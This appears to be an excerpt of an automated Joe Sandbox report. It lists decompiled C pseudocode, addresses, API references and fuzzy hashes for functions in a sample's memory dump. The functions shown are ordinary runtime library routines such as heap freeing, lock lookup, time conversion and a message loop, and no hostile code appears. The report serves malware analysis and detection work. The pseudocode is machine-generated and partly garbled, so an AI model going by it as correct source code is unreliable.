                                                    0x00cd996c
                                                    0x00cd9972
                                                    0x00cd9974
                                                    0x00cd997c
                                                    0x00cd998d
                                                    0x00cd9998
                                                    0x00cd999a
                                                    0x00cd999d
                                                    0x00cd99a1
                                                    0x00cd99a6
                                                    0x00cd9a4f
                                                    0x00cd9a52
                                                    0x00cd9a56
                                                    0x00000000
                                                    0x00cd9a5f
                                                    0x00cd99ae
                                                    0x00cd99b0
                                                    0x00cd99b8
                                                    0x00cd99bb
                                                    0x00cd99bc
                                                    0x00cd99bf
                                                    0x00cd9a0d
                                                    0x00cd9a36
                                                    0x00cd9a36
                                                    0x00cd9a3a
                                                    0x00000000
                                                    0x00cd9a3a
                                                    0x00cd9a0f
                                                    0x00cd9a16
                                                    0x00000000
                                                    0x00cd9a1e
                                                    0x00cd9a27
                                                    0x00cd9a2e
                                                    0x00000000
                                                    0x00cd9a2e
                                                    0x00cd99d3
                                                    0x00cd99d5
                                                    0x00cd99d8
                                                    0x00cd99d9
                                                    0x00cd99e5
                                                    0x00cd99ec
                                                    0x00cd99ef
                                                    0x00cd99f4
                                                    0x00cd99f5
                                                    0x00cd99fc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd99fc
                                                    0x00cd99fe
                                                    0x00cd9a02
                                                    0x00cd9a05
                                                    0x00cd9a31
                                                    0x00cd9a33
                                                    0x00cd9a33
                                                    0x00cd9a3b
                                                    0x00cd9a3b
                                                    0x00cd9a40
                                                    0x00cd9a43
                                                    0x00cd9a48
                                                    0x00cd9a48
                                                    0x00000000
                                                    0x00cd99bc
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                    • API String ID: 176396367-3743748572
                                                    • Opcode ID: e67beaa5fa0aabfb02d8ec39cd752e8d31f4ce6af8f56b80832f82f680f0b394
                                                    • Instruction ID: 1ff2ea22f4cf5efc82f011bcce338f0387091c0f87963ce3996e2f9bdf295120
                                                    • Opcode Fuzzy Hash: e67beaa5fa0aabfb02d8ec39cd752e8d31f4ce6af8f56b80832f82f680f0b394
                                                    • Instruction Fuzzy Hash: 4031903B64438556D634AB919C42B7B73A4EB90320F50442FF69E87380FB70BF4093A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CEC8A4(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00CEC868(_t45, 7);
					E00CEC868(_t45 + 0x1c, 7);
					E00CEC868(_t45 + 0x38, 0xc);
					E00CEC868(_t45 + 0x68, 0xc);
					E00CEC868(_t45 + 0x98, 2);
					E00CE8DCC( *((intOrPtr*)(_t45 + 0xa0)));
					E00CE8DCC( *((intOrPtr*)(_t45 + 0xa4)));
					E00CE8DCC( *((intOrPtr*)(_t45 + 0xa8)));
					E00CEC868(_t45 + 0xb4, 7);
					E00CEC868(_t45 + 0xd0, 7);
					E00CEC868(_t45 + 0xec, 0xc);
					E00CEC868(_t45 + 0x11c, 0xc);
					E00CEC868(_t45 + 0x14c, 2);
					E00CE8DCC( *((intOrPtr*)(_t45 + 0x154)));
					E00CE8DCC( *((intOrPtr*)(_t45 + 0x158)));
					E00CE8DCC( *((intOrPtr*)(_t45 + 0x15c)));
					return E00CE8DCC( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                    0x00cec8aa
                                                    0x00cec8af
                                                    0x00cec8b8
                                                    0x00cec8c3
                                                    0x00cec8ce
                                                    0x00cec8d9
                                                    0x00cec8e7
                                                    0x00cec8f2
                                                    0x00cec8fd
                                                    0x00cec908
                                                    0x00cec916
                                                    0x00cec924
                                                    0x00cec935
                                                    0x00cec943
                                                    0x00cec951
                                                    0x00cec95c
                                                    0x00cec967
                                                    0x00cec972
                                                    0x00000000
                                                    0x00cec982
                                                    0x00cec987

                                                    APIs
                                                      • Part of subcall function 00CEC868: _free.LIBCMT ref: 00CEC891
                                                    • _free.LIBCMT ref: 00CEC8F2
                                                      • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                      • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                    • _free.LIBCMT ref: 00CEC8FD
                                                    • _free.LIBCMT ref: 00CEC908
                                                    • _free.LIBCMT ref: 00CEC95C
                                                    • _free.LIBCMT ref: 00CEC967
                                                    • _free.LIBCMT ref: 00CEC972
                                                    • _free.LIBCMT ref: 00CEC97D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                    • Instruction ID: b4fb0e72a834beba8870529c639b8cc0ee1e0faa0912b0e4b778991724d002cc
                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                    • Instruction Fuzzy Hash: D7112171580B85AAE530B7B3CD87FCB7BAC9F04B00F444C15B29D660D2DA75B60AA750
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00CDE5EE() {
				intOrPtr _t3;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t15;

				_t3 =  *0xd21cd8;
				if(_t3 == 1) {
					L11:
					return 0;
				}
				if(_t3 != 0) {
					return 1;
				}
				_t15 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t15 != 0) {
					_t7 = GetProcAddress(_t15, "AcquireSRWLockExclusive");
					if(_t7 == 0) {
						goto L3;
					}
					 *0xd21cdc = _t7;
					_t10 = GetProcAddress(_t15, "ReleaseSRWLockExclusive");
					if(_t10 == 0) {
						goto L3;
					}
					 *0xd21ce0 = _t10;
					L7:
					asm("lock cmpxchg [edx], ecx");
					if(0 != 0 || _t15 != 1) {
						return 0xbadbad;
					} else {
						goto L11;
					}
				}
				L3:
				_t15 = 1;
				goto L7;
			}







                                                    0x00cde5ee
                                                    0x00cde5fa
                                                    0x00cde65f
                                                    0x00000000
                                                    0x00cde65f
                                                    0x00cde5fe
                                                    0x00000000
                                                    0x00cde65b
                                                    0x00cde60b
                                                    0x00cde60f
                                                    0x00cde61b
                                                    0x00cde623
                                                    0x00000000
                                                    0x00000000
                                                    0x00cde62b
                                                    0x00cde630
                                                    0x00cde638
                                                    0x00000000
                                                    0x00000000
                                                    0x00cde63a
                                                    0x00cde63f
                                                    0x00cde648
                                                    0x00cde64e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cde64e
                                                    0x00cde611
                                                    0x00cde611
                                                    0x00000000

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CDE669,00CDE5CC,00CDE86D), ref: 00CDE605
                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CDE61B
                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CDE630
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                    • API String ID: 667068680-1718035505
                                                    • Opcode ID: f5cd57587a903cf35a6deb889793495124549858e960edda4ee42cce3c7a4836
                                                    • Instruction ID: 0c8afae9adf286ae41dfca87cd5aa24d4de1476f1ccda640d61e119ad1813283
                                                    • Opcode Fuzzy Hash: f5cd57587a903cf35a6deb889793495124549858e960edda4ee42cce3c7a4836
                                                    • Instruction Fuzzy Hash: 70F0C23978166AAB0B216E765C8467A62C86A35755300443BFB15DB300EB10CE57AAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 65%
                                                    			E00CD146A(signed int* __ecx, void* __edx, intOrPtr* _a4) {
				char _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				struct _FILETIME _v84;
				signed int _t56;
				signed int _t70;
				signed int _t72;
				signed int _t77;
				signed int _t85;
				intOrPtr* _t89;
				signed int _t90;
				signed int _t92;
				signed int* _t93;

				_t89 = _a4;
				_t93 = __ecx;
				_v48.wYear =  *_t89;
				_v48.wMonth =  *((intOrPtr*)(_t89 + 4));
				_v48.wDay =  *((intOrPtr*)(_t89 + 8));
				_v48.wHour =  *((intOrPtr*)(_t89 + 0xc));
				_v48.wMinute =  *((intOrPtr*)(_t89 + 0x10));
				_v48.wSecond =  *((intOrPtr*)(_t89 + 0x14));
				_v48.wMilliseconds = 0;
				_v48.wDayOfWeek.wYear = 0;
				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
					_t90 = 0;
					_t77 = 0;
				} else {
					if(E00CCB146() >= 0x600) {
						FileTimeToSystemTime( &_v64,  &_v32);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
						_t70 = _v84.dwHighDateTime + _v72.dwLowDateTime;
						asm("sbb eax, [esp+0x24]");
						asm("sbb eax, esi");
						asm("adc eax, esi");
						_t85 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
						asm("adc eax, esi");
					} else {
						LocalFileTimeToFileTime( &_v64,  &_v72);
						_t70 = _v72.dwHighDateTime.dwLowDateTime;
						_t85 = _v72.dwLowDateTime;
					}
					_t92 = 0x64;
					_t72 = _t85;
					_t77 = _t70 * _t92 + (_t72 * _t92 >> 0x20);
					_t90 = _t72 * _t92;
				}
				 *_t93 = _t90;
				_a4 = _t77;
				_t56 =  *((intOrPtr*)(_t89 + 0x18)) + _t90;
				asm("adc ecx, ebx");
				 *_t93 = _t56;
				_a4 = 0;
				return _t56;
			}



















                                                    0x00cd1471
                                                    0x00cd1475
                                                    0x00cd147a
                                                    0x00cd1483
                                                    0x00cd148c
                                                    0x00cd1495
                                                    0x00cd149e
                                                    0x00cd14a7
                                                    0x00cd14ae
                                                    0x00cd14b3
                                                    0x00cd14ca
                                                    0x00cd156c
                                                    0x00cd156e
                                                    0x00cd14d0
                                                    0x00cd14da
                                                    0x00cd1500
                                                    0x00cd1513
                                                    0x00cd1523
                                                    0x00cd1533
                                                    0x00cd153f
                                                    0x00cd1545
                                                    0x00cd154d
                                                    0x00cd1553
                                                    0x00cd1555
                                                    0x00cd1559
                                                    0x00cd14dc
                                                    0x00cd14e6
                                                    0x00cd14ec
                                                    0x00cd14f0
                                                    0x00cd14f0
                                                    0x00cd155d
                                                    0x00cd1562
                                                    0x00cd1566
                                                    0x00cd1568
                                                    0x00cd1568
                                                    0x00cd1570
                                                    0x00cd1575
                                                    0x00cd157b
                                                    0x00cd157e
                                                    0x00cd1580
                                                    0x00cd1584
                                                    0x00cd158c

                                                    APIs
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD14C2
                                                      • Part of subcall function 00CCB146: GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CD14E6
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CD1500
                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CD1513
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1523
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1533
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                    • String ID:
                                                    • API String ID: 2092733347-0
                                                    • Opcode ID: 59260349d37aac74b76e050f2d5a4cab0063b189252243d714484c0be444f586
                                                    • Instruction ID: 116a628425041425fae7ddcb19d7b4dcb8f64720a2af96792425fd5eeeea57a0
                                                    • Opcode Fuzzy Hash: 59260349d37aac74b76e050f2d5a4cab0063b189252243d714484c0be444f586
                                                    • Instruction Fuzzy Hash: E131D775108345ABC704DFA8D884A9FB7E8BF98714F048A1EF995C3210E734D649CBA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E00CE2AFA(void* __ecx, void* __edx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t18;
				void* _t24;
				long _t25;
				void* _t28;

				_t13 = __ecx;
				if( *0xcfe7d0 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E00CE3CCD(_t13, __eflags,  *0xcfe7d0);
					_t14 = _t24;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00CE3D08(_t14, __eflags,  *0xcfe7d0, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t28 = E00CE8DC1(_t16);
								_t18 = 1;
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00CE3D08(_t18, __eflags,  *0xcfe7d0, 0);
								} else {
									_t8 = E00CE3D08(_t18, __eflags,  *0xcfe7d0, _t28);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L00CE3E2E(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}













                                                    0x00ce2afa
                                                    0x00ce2b01
                                                    0x00ce2b14
                                                    0x00ce2b1b
                                                    0x00ce2b1d
                                                    0x00ce2b1e
                                                    0x00ce2b21
                                                    0x00ce2b3a
                                                    0x00ce2b3a
                                                    0x00ce2b23
                                                    0x00ce2b23
                                                    0x00ce2b25
                                                    0x00ce2b2f
                                                    0x00ce2b35
                                                    0x00ce2b36
                                                    0x00ce2b38
                                                    0x00ce2b3f
                                                    0x00ce2b48
                                                    0x00ce2b4b
                                                    0x00ce2b4c
                                                    0x00ce2b4e
                                                    0x00ce2b62
                                                    0x00ce2b62
                                                    0x00ce2b6b
                                                    0x00ce2b50
                                                    0x00ce2b57
                                                    0x00ce2b5d
                                                    0x00ce2b5e
                                                    0x00ce2b60
                                                    0x00ce2b74
                                                    0x00ce2b76
                                                    0x00ce2b76
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce2b60
                                                    0x00ce2b79
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce2b38
                                                    0x00ce2b25
                                                    0x00ce2b81
                                                    0x00ce2b8b
                                                    0x00ce2b03
                                                    0x00ce2b05
                                                    0x00ce2b05

                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00CE2AF1,00CE02FC,00CDFA34), ref: 00CE2B08
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CE2B16
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CE2B2F
                                                    • SetLastError.KERNEL32(00000000,00CE2AF1,00CE02FC,00CDFA34), ref: 00CE2B81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: d2784b1d664d5f5f4ee9903ba63e9c920ac22f6d66201f7027a430e0f6f6ec26
                                                    • Instruction ID: 079c0443349c9c496cb619b606790b09eab38698aeb6d253791013228af8ced5
                                                    • Opcode Fuzzy Hash: d2784b1d664d5f5f4ee9903ba63e9c920ac22f6d66201f7027a430e0f6f6ec26
                                                    • Instruction Fuzzy Hash: 0201D4321183926FA6242B777C89B3A2B9EEB51774760073AF121560F0EF956E00E545
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E00CE97E5(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_push(_t30);
				_t36 = GetLastError();
				_t2 =  *0xcfe7fc; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00CEB136(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00CEAEB1(_t20, _t25, _t31, __eflags,  *0xcfe7fc, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00CE9649(_t25, _t31, 0xd22288);
							E00CE8DCC(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00CE8DCC();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00CE8D24(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xcfe7fc; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00CEB136(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00CEAEB1(_t21, _t27, _t32, __eflags,  *0xcfe7fc, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00CE9649(_t27, _t32, 0xd22288);
									E00CE8DCC(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00CE8DCC();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00CEAE5B(0, _t25, _t31, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00CEAE5B(__ebx, _t23, _t30, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}






















                                                    0x00ce97e5
                                                    0x00ce97e5
                                                    0x00ce97e5
                                                    0x00ce97e8
                                                    0x00ce97ef
                                                    0x00ce97f1
                                                    0x00ce97f6
                                                    0x00ce97f9
                                                    0x00ce9807
                                                    0x00ce980e
                                                    0x00ce9813
                                                    0x00ce9816
                                                    0x00ce9819
                                                    0x00ce982b
                                                    0x00ce9830
                                                    0x00ce9832
                                                    0x00ce983d
                                                    0x00ce9844
                                                    0x00ce9849
                                                    0x00ce984c
                                                    0x00ce984e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9834
                                                    0x00ce9834
                                                    0x00000000
                                                    0x00ce9834
                                                    0x00ce981b
                                                    0x00ce981b
                                                    0x00ce981c
                                                    0x00ce981c
                                                    0x00ce9821
                                                    0x00ce985c
                                                    0x00ce985d
                                                    0x00ce9863
                                                    0x00ce9868
                                                    0x00ce986b
                                                    0x00ce986c
                                                    0x00ce986d
                                                    0x00ce9874
                                                    0x00ce9876
                                                    0x00ce9878
                                                    0x00ce987d
                                                    0x00ce9880
                                                    0x00ce988e
                                                    0x00ce989a
                                                    0x00ce989d
                                                    0x00ce98a0
                                                    0x00ce98b2
                                                    0x00ce98b7
                                                    0x00ce98b9
                                                    0x00ce98c4
                                                    0x00ce98ca
                                                    0x00ce98d2
                                                    0x00ce98d4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce98bb
                                                    0x00ce98bb
                                                    0x00000000
                                                    0x00ce98bb
                                                    0x00ce98a2
                                                    0x00ce98a2
                                                    0x00ce98a3
                                                    0x00ce98a3
                                                    0x00ce98d6
                                                    0x00ce98d7
                                                    0x00ce98d7
                                                    0x00ce9882
                                                    0x00ce9888
                                                    0x00ce988c
                                                    0x00ce98df
                                                    0x00ce98e0
                                                    0x00ce98e6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce988c
                                                    0x00ce98ed
                                                    0x00ce98ed
                                                    0x00ce97fb
                                                    0x00ce9801
                                                    0x00ce9805
                                                    0x00ce9850
                                                    0x00ce9851
                                                    0x00ce985b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce9805

                                                    APIs
                                                    • GetLastError.KERNEL32(?,00D01098,00CE4674,00D01098,?,?,00CE40EF,?,?,00D01098), ref: 00CE97E9
                                                    • _free.LIBCMT ref: 00CE981C
                                                    • _free.LIBCMT ref: 00CE9844
                                                    • SetLastError.KERNEL32(00000000,?,00D01098), ref: 00CE9851
                                                    • SetLastError.KERNEL32(00000000,?,00D01098), ref: 00CE985D
                                                    • _abort.LIBCMT ref: 00CE9863
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free$_abort
                                                    • String ID:
                                                    • API String ID: 3160817290-0
                                                    • Opcode ID: ba652a011d2fdc0285a7ebb227116b7427c3ad6c34f6586002e95d69e1fb1468
                                                    • Instruction ID: ea1a8d7c2134f078e651f7c6badbd51e0ce989989c0fbf7f7ee3aad15ccbee66
                                                    • Opcode Fuzzy Hash: ba652a011d2fdc0285a7ebb227116b7427c3ad6c34f6586002e95d69e1fb1468
                                                    • Instruction Fuzzy Hash: EEF0A4361406D266C73233277C0AB3F2A69DFD2775F250125F528921F2EE348A05D566
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDDC3B(void* _a4) {
				struct tagMSG _v32;
				long _t7;
				long _t10;

				_t7 = WaitForSingleObject(_a4, 0xa);
				if(_t7 == 0x102) {
					do {
						if(PeekMessageW( &_v32, 0, 0, 0, 0) != 0) {
							GetMessageW( &_v32, 0, 0, 0);
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
						}
						_t10 = WaitForSingleObject(_a4, 0xa);
					} while (_t10 == 0x102);
					return _t10;
				}
				return _t7;
			}






                                                    0x00cddc47
                                                    0x00cddc54
                                                    0x00cddc59
                                                    0x00cddc69
                                                    0x00cddc72
                                                    0x00cddc7c
                                                    0x00cddc86
                                                    0x00cddc86
                                                    0x00cddc91
                                                    0x00cddc97
                                                    0x00000000
                                                    0x00cddc9b
                                                    0x00cddc9e

                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CDDC47
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDDC61
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDDC72
                                                    • TranslateMessage.USER32(?), ref: 00CDDC7C
                                                    • DispatchMessageW.USER32(?), ref: 00CDDC86
